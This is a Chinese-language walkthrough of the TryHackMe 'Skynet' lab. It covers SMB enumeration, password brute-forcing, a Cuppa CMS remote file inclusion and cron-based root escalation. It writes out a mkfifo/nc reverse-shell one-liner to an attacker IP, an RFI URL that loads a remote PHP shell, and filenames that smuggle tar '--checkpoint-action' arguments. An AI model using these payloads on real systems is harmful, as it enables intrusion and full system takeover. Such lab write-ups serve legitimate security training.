Tryhackme -Skynet（考点：smb 密码爆破 cuppa RFI cronjob

1 扫描

忘了截图了，就是445 smb和80http 重要，一个进去找敏感文件，另一个进去搜集信息。

2 web信息搜集

gobuster扫gobuster dir -u http://10.10.190.147 -w /root/directory-list-2.3-medium.txt -t 64
松鼠邮件那个进去后是登录框。但是不知道密码

3 smb利用

enum4linux -a Ip地址

看到有俩处，匿名的当然可以进，mile那个没密码。

进匿名看，再log里，看到很多密码似的，保存下来，可以尝试爆破那个登录框。

懒得用hydra，要burp抓包写命令什么的，麻烦。简单的字典，直接burp里intruder里解密了。
参考靶机vulnversity操作方法一样。这篇是爆破后缀。
而我们此处，是爆破密码，因此在密码那里设置变量就行了。

字典就load刚才smb里发现的

开始攻击，第一个就是不一样的，就是他。

登录框登录，用户名就猜是smb里看到的那个milesdyson。成功

看到新的信件。重置了smb密码，也就是 smb 的milesdyson 我们有密码了。进去看看

smbclient -U milesdyson //10.10.190.147/milesdyson

进去后一路找，很简单，重要文件的名字都提示了是note important这些。看到新的目录。

gobuster再扫这个目录，发现是cuppa

4 cuppa RFI漏洞

搜到这个漏洞

https://www.exploit-db.com/exploits/25971

根据原文的提示，

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?

当然要稍微结合靶机，修改下最后的rfi漏洞目录

自己准备好弹shell的php，放在自己的http里，打开http服务python -m SimpleHTTPServer 80
然后开监听，点击，就收到了。

http://10.10.190.147/45kra24zxs28v3yd/administrator/cuppa/alerts/alertConfigField.php?urlConfig=http://10.9.23.70/phpevil.php

5 提权

老套路linpeas.sh自动扫

cronjob里root在执行这个sh脚本。cron简单理解就是每隔段时间就干特定的活。如果里面有设置了root干什么活，那多半就是提权突破口。一般ctf题里的cron不会设置很长时间的。最多几分钟，难道让你等很久？

看看sh脚本里在做啥。

进入一个目录，再tar，tar是个经常用的压缩工具。

提权方法可以参考神奇网站gtfobins或者其他人的其他方法。

官网上的blog也有，更简单。
记住都是在/var/www/html里执行这些，因为sh脚本里是进入这个目录执行tar。要配合他


echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.40.157 31337 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

等会就收到了。拿下。